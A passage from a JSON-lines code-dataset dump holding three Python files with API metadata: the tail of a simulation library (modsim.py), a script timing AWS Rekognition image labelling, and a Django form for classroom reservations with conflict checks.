slope_func: function that computes slopes\n\n returns: TimeFrame\n \"\"\"\n # the default message if nothing changes\n msg = \"The solver successfully reached the end of the integration interval.\"\n\n # get parameters from system\n init, t_0, t_end, dt = check_system(system, slope_func)\n\n # make the TimeFrame\n frame = TimeFrame(columns=init.index)\n frame.row[t_0] = init\n ts = linrange(t_0, t_end, dt) * get_units(t_end)\n\n event_func = options.get(\"events\", None)\n z1 = np.nan\n\n def project(y1, t1, slopes, dt):\n t2 = t1 + dt\n y2 = [y + slope * dt for y, slope in zip(y1, slopes)]\n return y2, t2\n\n # run the solver\n for t1 in ts:\n y1 = frame.row[t1]\n\n # evaluate the slopes at the start of the time step\n slopes1 = slope_func(y1, t1, system)\n\n # evaluate the slopes at the two-thirds point\n y_mid, t_mid = project(y1, t1, slopes1, 2 * dt / 3)\n slopes2 = slope_func(y_mid, t_mid, system)\n\n # compute the weighted sum of the slopes\n slopes = [(k1 + 3 * k2) / 4 for k1, k2 in zip(slopes1, slopes2)]\n\n # compute the next time stamp\n y2, t2 = project(y1, t1, slopes, dt)\n\n # check for a terminating event\n if event_func:\n z2 = event_func(y2, t2, system)\n if z1 * z2 < 0:\n scale = magnitude(z1 / (z1 - z2))\n y2, t2 = project(y1, t1, slopes, scale * dt)\n frame.row[t2] = y2\n msg = \"A termination event occurred.\"\n break\n else:\n z1 = z2\n\n # store the results\n frame.row[t2] = y2\n\n details = ModSimSeries(dict(success=True, message=msg))\n return frame, details\n\n\nrun_ode_solver = run_ralston\n\n# TODO: Implement leapfrog\n\n\ndef fsolve(func, x0, *args, **options):\n \"\"\"Return the roots of the (non-linear) equations\n defined by func(x) = 0 given a starting estimate.\n\n Uses scipy.optimize.fsolve, with extra error-checking.\n\n func: function to find the roots of\n x0: scalar or array, initial guess\n args: additional positional arguments are passed along to fsolve,\n which passes them along to func\n\n returns: solution as an array\n \"\"\"\n # make sure we can run the given function with x0\n try:\n func(x0, *args)\n except Exception as e:\n msg = \"\"\"Before running scipy.optimize.fsolve, I tried\n running the error function you provided with the x0\n you provided, and I got the following error:\"\"\"\n logger.error(msg)\n raise (e)\n\n # make the tolerance more forgiving than the default\n underride(options, xtol=1e-6)\n\n # run fsolve\n result = scipy.optimize.fsolve(func, x0, args=args, **options)\n\n return result\n\n\ndef crossings(series, value):\n \"\"\"Find the labels where the series passes through value.\n\n The labels in series must be increasing numerical values.\n\n series: Series\n value: number\n\n returns: sequence of labels\n \"\"\"\n values = series.values - value\n interp = InterpolatedUnivariateSpline(series.index, values)\n return interp.roots()\n\n\ndef has_nan(a):\n \"\"\"Checks whether the an array contains any NaNs.\n\n :param a: NumPy array or Pandas Series\n :return: boolean\n \"\"\"\n return np.any(np.isnan(a))\n\n\ndef is_strictly_increasing(a):\n \"\"\"Checks whether the elements of an array are strictly increasing.\n\n :param a: NumPy array or Pandas Series\n :return: boolean\n \"\"\"\n return np.all(np.diff(a) > 0)\n\n\ndef interpolate(series, **options):\n \"\"\"Creates an interpolation function.\n\n series: Series object\n options: any legal options to scipy.interpolate.interp1d\n\n returns: function that maps from the index to the values\n \"\"\"\n if has_nan(series.index):\n msg = \"\"\"The Series you passed to interpolate contains\n NaN values in the index, which would result in\n undefined behavior. So I'm putting a stop to that.\"\"\"\n raise ValueError(msg)\n\n if not is_strictly_increasing(series.index):\n msg = \"\"\"The Series you passed to interpolate has an index\n that is not strictly increasing, which would result in\n undefined behavior. So I'm putting a stop to that.\"\"\"\n raise ValueError(msg)\n\n # make the interpolate function extrapolate past the ends of\n # the range, unless `options` already specifies a value for `fill_value`\n underride(options, fill_value=\"extrapolate\")\n\n # call interp1d, which returns a new function object\n x = series.index\n y = series.values\n interp_func = interp1d(x, y, **options)\n return interp_func\n\n\ndef interpolate_inverse(series, **options):\n \"\"\"Interpolate the inverse function of a Series.\n\n series: Series object, represents a mapping from `a` to `b`\n options: any legal options to scipy.interpolate.interp1d\n\n returns: interpolation object, can be used as a function\n from `b` to `a`\n \"\"\"\n inverse = Series(series.index, index=series.values)\n interp_func = interpolate(inverse, **options)\n return interp_func\n\n\ndef gradient(series, **options):\n \"\"\"Computes the numerical derivative of a series.\n\n If the elements of series have units, they are dropped.\n\n series: Series object\n options: any legal options to np.gradient\n\n returns: Series, same subclass as series\n \"\"\"\n x = series.index\n y = series.values\n\n a = np.gradient(y, x, **options)\n return series.__class__(a, series.index)\n\n\ndef source_code(obj):\n \"\"\"Prints the source code for a given object.\n\n obj: function or method object\n \"\"\"\n print(inspect.getsource(obj))\n\n\ndef underride(d, **options):\n \"\"\"Add key-value pairs to d only if key is not in d.\n\n If d is None, create a new dictionary.\n\n d: dictionary\n options: keyword args to add to d\n \"\"\"\n if d is None:\n d = {}\n\n for key, val in options.items():\n d.setdefault(key, val)\n\n return d\n\n\ndef contour(df, **options):\n \"\"\"Makes a contour plot from a DataFrame.\n\n Wrapper for plt.contour\n https://matplotlib.org/3.1.0/api/_as_gen/matplotlib.pyplot.contour.html\n\n Note: columns and index must be numerical\n\n df: DataFrame\n options: passed to plt.contour\n \"\"\"\n fontsize = options.pop(\"fontsize\", 12)\n underride(options, cmap=\"viridis\")\n x = df.columns\n y = df.index\n X, Y = np.meshgrid(x, y)\n cs = plt.contour(X, Y, df, **options)\n plt.clabel(cs, inline=1, fontsize=fontsize)\n\n\ndef savefig(filename, **options):\n \"\"\"Save the current figure.\n\n Keyword arguments are passed along to plt.savefig\n\n https://matplotlib.org/api/_as_gen/matplotlib.pyplot.savefig.html\n\n filename: string\n \"\"\"\n print(\"Saving figure to file\", filename)\n plt.savefig(filename, **options)\n\n\ndef decorate(**options):\n \"\"\"Decorate the current axes.\n\n Call decorate with keyword arguments like\n decorate(title='Title',\n xlabel='x',\n ylabel='y')\n\n The keyword arguments can be any of the axis properties\n https://matplotlib.org/api/axes_api.html\n \"\"\"\n ax = plt.gca()\n ax.set(**options)\n\n handles, labels = ax.get_legend_handles_labels()\n if handles:\n ax.legend(handles, labels)\n\n plt.tight_layout()\n\n\ndef remove_from_legend(bad_labels):\n \"\"\"Removes some labels from the legend.\n\n bad_labels: sequence of strings\n \"\"\"\n ax = plt.gca()\n handles, labels = ax.get_legend_handles_labels()\n handle_list, label_list = [], []\n for handle, label in zip(handles, labels):\n if label not in bad_labels:\n handle_list.append(handle)\n label_list.append(label)\n ax.legend(handle_list, label_list)\n\n\nclass SettableNamespace(SimpleNamespace):\n \"\"\"Contains a collection of parameters.\n\n Used to make a System object.\n\n Takes keyword arguments and stores them as attributes.\n \"\"\"\n def __init__(self, namespace=None, **kwargs):\n super().__init__()\n if namespace:\n self.__dict__.update(namespace.__dict__)\n self.__dict__.update(kwargs)\n\n def get(self, name, default=None):\n \"\"\"Look up a variable.\n\n name: string varname\n default: value returned if `name` is not present\n \"\"\"\n try:\n return self.__getattribute__(name, default)\n except AttributeError:\n return default\n\n def set(self, **variables):\n \"\"\"Make a copy and update the given variables.\n\n returns: Params\n \"\"\"\n new = copy(self)\n new.__dict__.update(variables)\n return new\n\n\ndef magnitude(x):\n \"\"\"Returns the magnitude of a Quantity or number.\n\n x: Quantity or number\n\n returns: number\n \"\"\"\n return x.magnitude if hasattr(x, 'magnitude') else x\n\n\ndef remove_units(namespace):\n \"\"\"Removes units from the values in a Namespace.\n\n Only removes units from top-level values;\n does not traverse nested values.\n\n returns: new Namespace object\n \"\"\"\n res = copy(namespace)\n for label, value in res.__dict__.items():\n if isinstance(value, pd.Series):\n value = remove_units_series(value)\n res.__dict__[label] = magnitude(value)\n return res\n\n\ndef remove_units_series(series):\n \"\"\"Removes units from the values in a Series.\n\n Only removes units from top-level values;\n does not traverse nested values.\n\n returns: new Series object\n \"\"\"\n res = copy(series)\n for label, value in res.iteritems():\n res[label] = magnitude(value)\n return res\n\n\nclass System(SettableNamespace):\n \"\"\"Contains system parameters and their values.\n\n Takes keyword arguments and stores them as attributes.\n \"\"\"\n pass\n\n\nclass Params(SettableNamespace):\n \"\"\"Contains system parameters and their values.\n\n Takes keyword arguments and stores them as attributes.\n \"\"\"\n pass\n\n\ndef State(**variables):\n \"\"\"Contains the values of state variables.\"\"\"\n return pd.Series(variables)\n\n\ndef TimeSeries(*args, **kwargs):\n \"\"\"\n \"\"\"\n if args or kwargs:\n series = pd.Series(*args, **kwargs)\n else:\n series = pd.Series([], dtype=np.float64)\n\n series.index.name = 'Time'\n if 'name' not in kwargs:\n series.name = 'Quantity'\n return series\n\n\ndef SweepSeries(*args, **kwargs):\n \"\"\"\n \"\"\"\n if args or kwargs:\n series = pd.Series(*args, **kwargs)\n else:\n series = pd.Series([], dtype=np.float64)\n\n series.index.name = 'Parameter'\n if 'name' not in kwargs:\n series.name = 'Metric'\n return series\n\n\ndef TimeFrame(*args, **kwargs):\n \"\"\"DataFrame that maps from time to State.\n \"\"\"\n return pd.DataFrame(*args, **kwargs)\n\n\ndef SweepFrame(*args, **kwargs):\n \"\"\"DataFrame that maps from parameter value to SweepSeries.\n \"\"\"\n return pd.DataFrame(*args, **kwargs)\n\n\ndef Vector(x, y, z=None, **options):\n \"\"\"\n \"\"\"\n if z is None:\n return pd.Series(dict(x=x, y=y), **options)\n else:\n return pd.Series(dict(x=x, y=y, z=z), **options)\n\n\n## Vector functions (should work with any sequence)\n\ndef vector_mag(v):\n \"\"\"Vector magnitude.\"\"\"\n return np.sqrt(np.dot(v, v))\n\n\ndef vector_mag2(v):\n \"\"\"Vector magnitude squared.\"\"\"\n return np.dot(v, v)\n\n\ndef vector_angle(v):\n \"\"\"Angle between v and the positive x axis.\n\n Only works with 2-D vectors.\n\n returns: angle in radians\n \"\"\"\n assert len(v) == 2\n x, y = v\n return np.arctan2(y, x)\n\n\ndef vector_polar(v):\n \"\"\"Vector magnitude and angle.\n\n returns: (number, angle in radians)\n \"\"\"\n return vector_mag(v), vector_angle(v)\n\n\ndef vector_hat(v):\n \"\"\"Unit vector in the direction of v.\n\n returns: Vector or array\n \"\"\"\n # check if the magnitude of the Quantity is 0\n mag = vector_mag(v)\n if mag == 0:\n return v\n else:\n return v / mag\n\n\ndef vector_perp(v):\n \"\"\"Perpendicular Vector (rotated left).\n\n Only works with 2-D Vectors.\n\n returns: Vector\n \"\"\"\n assert len(v) == 2\n x, y = v\n return Vector(-y, x)\n\n\ndef vector_dot(v, w):\n \"\"\"Dot product of v and w.\n\n returns: number or Quantity\n \"\"\"\n return np.dot(v, w)\n\n\ndef vector_cross(v, w):\n \"\"\"Cross product of v and w.\n\n returns: number or Quantity for 2-D, Vector for 3-D\n \"\"\"\n res = np.cross(v, w)\n\n if len(v) == 3:\n return Vector(*res)\n else:\n return res\n\n\ndef vector_proj(v, w):\n \"\"\"Projection of v onto w.\n\n returns: array or Vector with direction of w and units of v.\n \"\"\"\n w_hat = vector_hat(w)\n return vector_dot(v, w_hat) * w_hat\n\n\ndef scalar_proj(v, w):\n \"\"\"Returns the scalar projection of v onto w.\n\n Which is the magnitude of the projection of v onto w.\n\n returns: scalar with units of v.\n \"\"\"\n return vector_dot(v, vector_hat(w))\n\n\ndef vector_dist(v, w):\n \"\"\"Euclidean distance from v to w, with units.\"\"\"\n if isinstance(v, list):\n v = np.asarray(v)\n return vector_mag(v - w)\n\n\ndef vector_diff_angle(v, w):\n \"\"\"Angular difference between two vectors, in radians.\n \"\"\"\n if len(v) == 2:\n return vector_angle(v) - vector_angle(w)\n else:\n # TODO: see http://www.euclideanspace.com/maths/algebra/\n # vectors/angleBetween/\n raise NotImplementedError()\n\n\ndef plot_segment(A, B, **options):\n \"\"\"Plots a line segment between two Vectors.\n\n For 3-D vectors, the z axis is ignored.\n\n Additional options are passed along to plot().\n\n A: Vector\n B: Vector\n \"\"\"\n xs = A.x, B.x\n ys = A.y, B.y\n plot(xs, ys, **options)\n\n\nfrom time import sleep\nfrom IPython.display import clear_output\n\ndef animate(results, draw_func, *args, interval=None):\n \"\"\"Animate results from a simulation.\n\n results: TimeFrame\n draw_func: function that draws state\n interval: time between frames in seconds\n \"\"\"\n plt.figure()\n try:\n for t, state in results.iterrows():\n draw_func(t, state, *args)\n plt.show()\n if interval:\n sleep(interval)\n clear_output(wait=True)\n draw_func(t, state, *args)\n plt.show()\n except KeyboardInterrupt:\n pass\n", "sub_path": "jupyter/modsim.py", "file_name": "modsim.py", "file_ext": "py", "file_size_in_byte": 28491, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pint.UnitRegistry", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.hypot", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 101, "usage_type": "call"}, {"api_name": "scipy.optimize.leastsq", "line_number": 124, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 124, "usage_type": "attribute"}, {"api_name": "scipy.optimize.minimize_scalar", "line_number": 163, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 232, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 298, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 298, "usage_type": "attribute"}, {"api_name": "scipy.integrate.solve_ivp", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 523, "usage_type": "attribute"}, {"api_name": "scipy.optimize.fsolve", "line_number": 598, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 598, "usage_type": "attribute"}, {"api_name": "scipy.interpolate.InterpolatedUnivariateSpline", "line_number": 614, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 624, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 624, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 633, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 633, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 663, "usage_type": "call"}, {"api_name": "numpy.gradient", "line_number": 694, "usage_type": "call"}, {"api_name": "inspect.getsource", "line_number": 703, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 738, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contour", "line_number": 739, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 739, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clabel", "line_number": 740, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 740, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 753, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 753, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 767, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 767, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 774, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 774, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 782, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 782, "usage_type": "name"}, {"api_name": "types.SimpleNamespace", "line_number": 792, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 821, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 844, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 846, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 860, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 884, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 891, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 893, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 893, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 905, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 907, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 907, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 918, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 924, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 931, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 933, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 940, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 940, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 945, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 957, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 998, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 1006, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 1036, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1076, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1076, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1080, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1080, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 1082, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 1083, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1085, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1085, "usage_type": "name"}]} +{"seq_id": "645765159", "text": "from PIL import Image\nimport boto3\nimport time\nimport os\nimport json\n\nbase = os.getcwd()\nmanPhotoDir = os.path.join(base,'ver_3')\n#photo = '3.png'\nregion='eu-west-1'\n\n#with open(photo, 'rb') as source_image:\n# source_bytes = source_image.read()\nxVectors = [-50, 0, 50]\nyVectors = [100, 150, 200, 250, 300]\nsavedPhotos = [1, 2, 3, 4, 5, 6]\nphotosType = ['FrontOff1', 'FrontOff2', 'FrontOn1', 'FrontOn2', 'Back1', 'Back2']\nfileNames =list()\nprint('geting paths of files')\nfor y in yVectors:\n for x in xVectors:\n for photoNo in savedPhotos:\n fileNames.append(os.path.join(os.path.join(manPhotoDir, str(y) + '_' + str(x) ), str(photoNo) +'.bmp'))\nresultDictionary = dict.fromkeys(fileNames , '')\nformatTimes = list()\nprint('convert bmps to png')\nfor fName in fileNames:\n start_time = time.time()\n Image.open(fName).save(fName.replace('.bmp', '.png'))\n resultDictionary[fName]=str((time.time() - start_time)*1000)\n# formatTimes.append()\n#print(\"Times for coverting files\")\n#print(', '.join(str(x) for x in formatTimes))\nprint('sending requests')\nclient = boto3.client('rekognition')\nfor fName in fileNames:\n with open(fName.replace('.bmp', '.png'), 'rb') as source_image:\n source_bytes = source_image.read()\n start_time = time.time()\n response = client.detect_labels(Image={'Bytes': source_bytes}, MaxLabels = 3)\n resultDictionary[fName]+=';'+str((time.time() - start_time)*1000)+os.linesep+json.dumps(response)\nprint('saving responses')\na_file = open('results.json', 'w')\njson.dump(resultDictionary, a_file)\na_file.close()\n\n", "sub_path": "SJU_boto_recognition.py", "file_name": "SJU_boto_recognition.py", "file_ext": "py", "file_size_in_byte": 1575, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.getcwd", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 29, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 29, "usage_type": "name"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 35, "usage_type": "call"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}, {"api_name": "time.time", "line_number": 41, "usage_type": "call"}, {"api_name": "os.linesep", "line_number": 41, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 41, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "414775620", "text": "import datetime\n\nfrom django.core.exceptions import ValidationError\nfrom django.forms import ModelForm, ModelMultipleChoiceField, forms, CheckboxSelectMultiple, DateInput, TextInput, \\\n BooleanField\nfrom django.db.models import Prefetch\nfrom django.template import defaultfilters\n\nfrom urnik.models import Oseba, Predmet, Ucilnica, Rezervacija\nfrom urnik.templatetags.tags import dan_tozilnik_mnozina\n\n\nclass PredmetModelMultipleChoiceField(ModelMultipleChoiceField):\n def label_from_instance(self, obj):\n return obj.opisno_ime()\n\n\nclass OsebeModelMultipleChoiceField(ModelMultipleChoiceField):\n def label_from_instance(self, obj):\n return obj.priimek_ime\n\n\nclass UcilniceModelMultipleChoiceField(ModelMultipleChoiceField):\n def label_from_instance(self, obj):\n return obj.oznaka\n\n\nclass KombiniranPogledForm(forms.Form):\n oseba = OsebeModelMultipleChoiceField(queryset=Oseba.objects.aktivni(), required=False)\n predmet = PredmetModelMultipleChoiceField(queryset=Predmet.objects.exclude(ime=\"\").prefetch_related('letniki'), required=False)\n\n\nclass RezevacijeForm(ModelForm):\n\n PREKRIVANJA = 'prekrivanja'\n\n osebe = OsebeModelMultipleChoiceField(queryset=Oseba.objects.all(),\n help_text='Osebe, ki si lastijo to rezervacijo. Te osebe bodo lahko rezervacijo '\n 'spreminjale, prikazala pa se bo tudi na njihovem tedenskem urniku.')\n ucilnice = UcilniceModelMultipleChoiceField(queryset=Ucilnica.objects.objavljene(),\n help_text='Izberite učilnice, ki jih želite rezervirati',\n widget=CheckboxSelectMultiple())\n predmeti = PredmetModelMultipleChoiceField(queryset=Predmet.objects.all(),\n required=False,\n help_text='Predmeti, povezani s to rezervacijo. Lahko pustite prazno. '\n 'Če izberete enega ali več predmetov, se bo rezervacija pokazala na tedenskem '\n 'urniku predmeta in vseh letnikov, ki predmet imajo.')\n use_required_attribute = False\n\n class Meta:\n model = Rezervacija\n fields = ['ucilnice', 'osebe', 'dan', 'dan_konca', 'od', 'do', 'opomba', 'predmeti']\n widgets = {\n 'dan': DateInput(attrs={'placeholder': 'npr. 15. 1. 2019', 'class': 'datepicker'}),\n 'dan_konca': DateInput(attrs={'placeholder': 'ponavadi prazno, lahko tudi npr. 17. 1. 2019', 'class': 'datepicker'}),\n 'opomba': TextInput(attrs={'placeholder': 'npr. \"sestanek raziskovalne skupine\", ali pa \"kolokvij ALG1\"'}),\n }\n\n def __init__(self, *args, **kwargs):\n dovoli_prekrivanja = kwargs.pop('dovoli_prekrivanja', None)\n super(RezevacijeForm, self).__init__(*args, **kwargs)\n if dovoli_prekrivanja:\n self.fields['ignoriraj_prekrivanja'] = BooleanField(\n required=False, initial=False,\n help_text='Zavedam se prekrivanj in vseeno želim rezervirati izbrane učilnice '\n 'v izbranih dnevih in urah.')\n\n def clean_dan(self):\n dan = self.cleaned_data['dan']\n if dan < datetime.date.today():\n raise ValidationError(\"Datum rezervacije mora biti v prihodnosti.\")\n return dan\n\n def clean(self):\n cleaned = super().clean()\n if self.errors:\n return cleaned\n\n od = cleaned.get('od')\n do = cleaned.get('do')\n if od >= do:\n self.add_error(None, ValidationError(\"Ura začetka rezervacije mora biti pred uro konca rezervacije.\"))\n\n dan = cleaned.get('dan')\n konec = cleaned.get('dan_konca')\n if konec:\n if dan == konec:\n self.cleaned_data['dan_konca'] = None\n elif dan > konec:\n self.add_error(None, ValidationError(\"Dan začetka rezervacije moda biti \"\n \"pred dnevom konca rezervacije.\"))\n ignoriraj = cleaned.get('ignoriraj_prekrivanja')\n if not ignoriraj:\n self._preveri_konflikte(cleaned)\n\n return self.cleaned_data\n\n def _preveri_konflikte(self, cleaned):\n from urnik.iskanik_konfliktov import IskalnikKonfliktov\n ucilnice = cleaned.get('ucilnice')\n dan = cleaned.get('dan')\n konec = cleaned.get('dan_konca') or dan\n od = cleaned.get('od')\n do = cleaned.get('do')\n iskalnik = IskalnikKonfliktov(ucilnice, dan, konec)\n iskalnik.dodaj_srecanja()\n iskalnik.dodaj_rezervacije(Rezervacija.objects.prihajajoce().prefetch_related(Prefetch('ucilnice', to_attr='seznam_ucilnic')))\n\n date_format = lambda d: defaultfilters.date(d, \"D, j. b\")\n for u in ucilnice:\n if u.dovoli_veckratno_rezervacijo:\n continue\n d = dan\n while d <= konec:\n konflikti = iskalnik.konflikti(u, d, od, do)\n for r in konflikti.rezervacije:\n oseba = r.osebe.all()[:1]\n self.add_error(None, ValidationError(\n 'Vaša rezervacija bi se prekrivala z rezervacijo osebe %(oseba)s %(dan)s '\n 'od %(od)i do %(do)i z razlogom %(razlog)s.',\n params={\n 'oseba': oseba[0] if oseba else 'neznan',\n 'dan': \"od {} do {}\".format(date_format(r.dan), date_format(r.dan_konca))\n if r.dan_konca else \"dne {}\".format(date_format(r.dan)),\n 'razlog': r.opomba,\n 'od': r.od,\n 'do': r.do,\n },\n code=RezevacijeForm.PREKRIVANJA,\n ))\n\n for s in konflikti.srecanja:\n self.add_error(None, ValidationError(\n 'Vaša rezervacija bi se prekrivala s predmetom %(predmet)s (%(semester)s), ki se izvaja '\n 'ob %(dan_v_tednu)s od %(od)i do %(do)i.',\n params={\n 'predmet': s.predmet,\n 'semester': s.semester,\n 'dan_v_tednu': dan_tozilnik_mnozina(s.dan),\n 'od': s.od,\n 'do': s.do,\n },\n code=RezevacijeForm.PREKRIVANJA,\n ))\n\n d += datetime.timedelta(days=1)\n", "sub_path": "urnik/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 6707, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 13, "usage_type": "name"}, {"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 23, "usage_type": "name"}, {"api_name": "django.forms.forms.Form", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.forms.forms", "line_number": 28, "usage_type": "name"}, {"api_name": "urnik.models.Oseba.objects.aktivni", "line_number": 29, "usage_type": "call"}, {"api_name": "urnik.models.Oseba.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "urnik.models.Oseba", "line_number": 29, "usage_type": "name"}, {"api_name": "urnik.models.Predmet.objects.exclude", "line_number": 30, "usage_type": "call"}, {"api_name": "urnik.models.Predmet.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "urnik.models.Predmet", "line_number": 30, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 33, "usage_type": "name"}, {"api_name": "urnik.models.Oseba.objects.all", "line_number": 37, "usage_type": "call"}, {"api_name": "urnik.models.Oseba.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "urnik.models.Oseba", "line_number": 37, "usage_type": "name"}, {"api_name": "urnik.models.Ucilnica.objects.objavljene", "line_number": 40, "usage_type": "call"}, {"api_name": "urnik.models.Ucilnica.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "urnik.models.Ucilnica", "line_number": 40, "usage_type": "name"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 42, "usage_type": "call"}, {"api_name": "urnik.models.Predmet.objects.all", "line_number": 43, "usage_type": "call"}, {"api_name": "urnik.models.Predmet.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "urnik.models.Predmet", "line_number": 43, "usage_type": "name"}, {"api_name": "urnik.models.Rezervacija", "line_number": 51, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 54, "usage_type": "call"}, {"api_name": "django.forms.DateInput", "line_number": 55, "usage_type": "call"}, {"api_name": "django.forms.TextInput", "line_number": 56, "usage_type": "call"}, {"api_name": "django.forms.BooleanField", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 70, "usage_type": "attribute"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 71, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 82, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 90, "usage_type": "call"}, {"api_name": "urnik.iskanik_konfliktov.IskalnikKonfliktov", "line_number": 105, "usage_type": "call"}, {"api_name": "urnik.models.Rezervacija.objects.prihajajoce", "line_number": 107, "usage_type": "call"}, {"api_name": "urnik.models.Rezervacija.objects", "line_number": 107, "usage_type": "attribute"}, {"api_name": "urnik.models.Rezervacija", "line_number": 107, "usage_type": "name"}, {"api_name": "django.db.models.Prefetch", "line_number": 107, "usage_type": "call"}, {"api_name": "django.template.defaultfilters.date", "line_number": 109, "usage_type": "call"}, {"api_name": "django.template.defaultfilters", "line_number": 109, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 118, "usage_type": "call"}, {"api_name": "{'IskalnikKonfliktov': 'urnik.iskanik_konfliktov.IskalnikKonfliktov'}.PREKRIVANJA", "line_number": 129, "usage_type": "attribute"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 133, "usage_type": "call"}, {"api_name": "urnik.templatetags.tags.dan_tozilnik_mnozina", "line_number": 139, "usage_type": "call"}, {"api_name": 